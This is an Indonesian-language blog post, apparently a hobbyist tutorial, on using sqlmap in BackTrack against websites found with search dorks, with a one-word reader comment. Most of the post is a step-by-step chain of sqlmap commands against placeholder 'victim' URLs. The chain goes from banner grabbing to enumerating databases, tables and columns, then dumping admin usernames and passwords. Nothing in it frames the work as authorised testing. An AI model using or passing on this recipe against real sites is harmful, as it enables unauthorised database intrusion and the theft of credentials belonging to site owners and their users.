cara menggunakan sqlmap di backtrack
Kali ini saya ingin menjelaskan cara penggunaan sqlmap pada backtrack, berawal dari sebuah website saya memplajari sqlmap nah lansung saja ahk dari pada berlama lama oh iyya sqlmap ini di gunakan untuk mengexploitasi kelemahan SQL dan untuk mengambil alih server database.
nah lansung aja
Pertama yang dipersiapkan adalah situs yang vulnerable menggunakan dork
Masuk ke direktori sqlmap
Perintah: root@bt:~# cd /pentest/database/sqlmap
Lalu jalankan perintah berikut
root@bt:~# ./sqlmap.py -u http://situs-target-yang-mempunyai-vuln.com/indexs.html?id=8 --random-agent --thread 10 --banner
Hal yang dilakukan diatas adalah untuk mencari celah melalui banner yang ada dalam situs tersebut.
Selanjutnya mencari database dan pengguna terakhir dari web tersebut
root@bt:~# ./sqlmap.py -u http://situs-target-yang-mempunyai-vuln.com/indexs.html?id=8 --random-agent --thread 10 --current-user --current-db
contohnya akan tampil seperti ini :
[*] tarada >> database dari situs tersebut
[*] admin@localhost >> admin situs tersebut
Lakukan injeksi pada database yang telah di pilih tadi
root@bt:~# ./sqlmap.py -u http://situs-target-yang-mempunyai-vuln.com/indexs.html?id=8 --random-agent --thread 10 --dbs
Setelah nama database di dapatkan masukkan perintah berikut untuk melihat isi tables pada database
root@bt:~# ./sqlmap.py -u http://site_victim.com/indeks.html?staff_id=8 --random-agent --thread 10 -D nama_database --tables
Cari columns dari tables database tersebut.
root@bt:~# ./sqlmap.py -u http://situs-target-yang-mempunyai-vuln.com/indexs.html?id=8 --random-agent --thread 10 -D nama_database --columns
Columns didapat, sekarang masuk ke column untuk mencari username dan password admin
root@bt:~# ./sqlmap.py -u http://situs-target-yang-mempunyai-vuln.com/indexs.html?id=8 --random-agent --thread 10 -D nama_database -C nama_columns --dump
nga selamat mencoba dan sekian dari saya mohon maaf bila ada salah2 kata
kren,,,,
ReplyDelete